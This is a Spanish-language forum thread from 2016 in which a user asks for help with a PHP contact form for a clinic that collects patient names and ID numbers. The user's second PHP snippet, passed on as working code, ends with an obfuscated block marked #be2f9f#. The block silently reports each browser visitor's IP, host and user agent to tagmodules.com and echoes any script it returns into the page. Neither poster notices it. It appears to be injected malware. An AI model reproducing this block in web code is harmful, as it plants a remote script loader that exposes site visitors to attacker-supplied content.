PHP - problema al enviar formularios con php

 
Vista:
sin imagen de perfil

problema al enviar formularios con php

Publicado por sergio (2 intervenciones) el 26/05/2016 17:40:22
Hola!, soy nuevo con este lenguaje y tengo un problema, estoy actualizando la pagina de mi trabajo y he decidido meter un formulario de contacto que no consigo que envie nada, repasando el codigo no encuentro el error, a ver si me podeis hechar una mano. Supuestamente es muy sencillo pero no dejo de romperme la cabeza con esto. Gracias

Aqui os paso el codigo del formulario

1
2
3
4
5
6
7
8
9
10
11
12
<form class="petilisolet" action="peticionok.php" method="POST">
	<div id="titulo_peticion">FORMULARIO DE PETICIÓN</div>
	<div class="seccion1"><label class="1">Nombre de la clínica:</label><input value='' name="clinica" type="text" id="clinica"></div>
	<div class="seccion2"><label class="2">Doctor/a que lo solicita:</label><input value='' name="doctor" type="text" id="doctor"></div>
	<div class="seccion1"><label class="1">Fecha de extracción:</label><input value='' name="extraccion" type="text" id="extraccion"></div>
	<div class="seccion2"><label class="2">Tipo de aplicación:</label><input value='' name="aplicacion" type="text" id="aplicacion"></div>
	<div class="seccion1"><label class="1">Nombre y apellidos del paciente:</label><input value='' name="paciente" type="text" id="paciente"></div>
	<div class="seccion2"><label class="2">DNI del paciente:</label><input value='' name="dni_paciente" type="text" id="dni_paciente"></div>
	<div class="seccion1"><label class="1">Fecha de la inyección:</label><input value='' name="inyeccion" type="text" id="inyeccion"></div>
 
	<center><div><input class="enviar_peticion" type='submit' value='ENVIAR'></div></center>
</form>


y aqui el codigo php para que se envie


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
if(isset($_POST['email'])) {
 
$email_to = "segarradelaflorsergio@gmail.com";
$email_subject = "Petición de Lisolet";
 
 
if(!isset($_POST['clinica']) ||
!isset($_POST['doctor']) ||
!isset($_POST['extraccion']) ||
!isset($_POST['aplicacion']) ||
!isset($_POST['paciente']) ||
!isset($_POST['dni_paciente']) ||
!isset($_POST['inyeccion'])) {
 
echo "<b>Ha ocurrido un error y el formulario no ha podido enviarse. </b><br />";
echo "Por favor, vuelva atrás y verifique los datos ingresados<br />";
die();
}
 
$email_message = "Detalles del formulario de petición:\n\n";
$email_message .= "Clinica: " . $_POST['clinica'] . "\n";
$email_message .= "Doctor: " . $_POST['doctor'] . "\n";
$email_message .= "Fecha de extracción: " . $_POST['extraccion'] . "\n";
$email_message .= "Tipo de aplicación: " . $_POST['aplicacion'] . "\n";
$email_message .= "Nombre del paciente: " . $_POST['paciente'] . "\n\n";
$email_message .= "Dni del paciente: " . $_POST['dni_paciente'] . "\n\n";
$email_message .= "Fecha de la inyección: " . $_POST['inyeccion'] . "\n\n";
 
 
$headers = 'From: '.$email_from."\r\n".
'Reply-To: '.$email_from."\r\n" .
'X-Mailer: PHP/' . phpversion();
@mail($email_to, $email_subject, $email_message, $headers);
 
echo "¡El formulario se ha enviado correctamente!";
}
?>

En un principio el formulario llama a un archivo php donde iria este codigo.
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder
Imágen de perfil de Julio Cesar

problema al enviar formularios con php

Publicado por Julio Cesar (2 intervenciones) el 26/05/2016 20:37:42
Buenas,
el problema que yo veo es que nunca entra al if(isset($_POST['email'])), dado q en el formulario no veo que envies mediante el POST una variable con el nombre de email, prueba quitando esa sentencia, para ver si te funciona.

Saludos...
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar
sin imagen de perfil

problema al enviar formularios con php

Publicado por sergio (2 intervenciones) el 27/05/2016 02:20:47
Sigue dandome error, el caso es que he probado este otro código que me ha pasado un compañero y que en otro server con otro proyecto funciona perfectamente. Es posible que el server no reconozca el lenguaje o algo asi?, si es asi como lo puedo averiguar?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
$clinica = $_POST['clinica'];
$doctor = $_POST['doctor'];
$extraccion = $_POST['extraccion'];
$aplicacion = $_POST['aplicacion'];
$paciente = $_POST['paciente'];
$dni_paciente = $_POST['dni_paciente'];
$inyeccion = $_POST['inyeccion'];
 
$header = 'From: ' . $mail . " \r\n";
$header .= "X-Mailer: PHP/" . phpversion() . " \r\n";
$header .= "Mime-Version: 1.0 \r\n";
$header .= "Content-Type: text/plain";
 
$mensaje = "Clinica : " . $clinica . " \r\n";
$mensaje .= "Doctor que lo solicita : " . $doctor . " \r\n";
$mensaje .= "Fecha de extraccion : " . $extraccion . " \r\n";
$mensaje .= "Tipo de aplicacion : " . $aplicacion . " \r\n";
$mensaje .= "Nombre del paciente: " . $paciente . " \r\n";
$mensaje .= "DNI del paciente: " . $dni_paciente . " \r\n";
$mensaje .= "Fecha de la inyeccion: " . $inyeccion . " \r\n";
/*$mensaje .= "Mensaje: " . $_POST['mensaje'] . " \r\n";*/
$mensaje .= "Enviado el " . date('d/m/Y', time());
 
$para = 'segarradelaflorsergio@gmail.com';
$asunto = 'Mensaje desde la web';
 
mail($para, $asunto, utf8_decode($mensaje), $header);
 
echo 'Mensaje enviado correctamente, le mandaremos una respuesta a su correo con la mayor brevedad posible. Gracias por su paciencia';
echo '<br/>';
echo '<br/>';
echo 'Message sent successfully, we will send a reply to your email as soon as possible. Thanks for your patience';
 
?>
<?php
#be2f9f#
error_reporting(0); @ini_set('display_errors',0); $wp_ml59 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_ml59) && !preg_match ('/bot/i', $wp_ml59))){
$wp_ml0959="http://"."tag"."modules".".com/"."modules"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_ml59);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_ml0959); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_59ml = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_59ml = @file_get_contents($wp_ml0959);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_59ml=@stream_get_contents(@fopen($wp_ml0959, "r"));}}
if (substr($wp_59ml,1,3) === 'scr'){ echo $wp_59ml; }
#/be2f9f#
?>
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar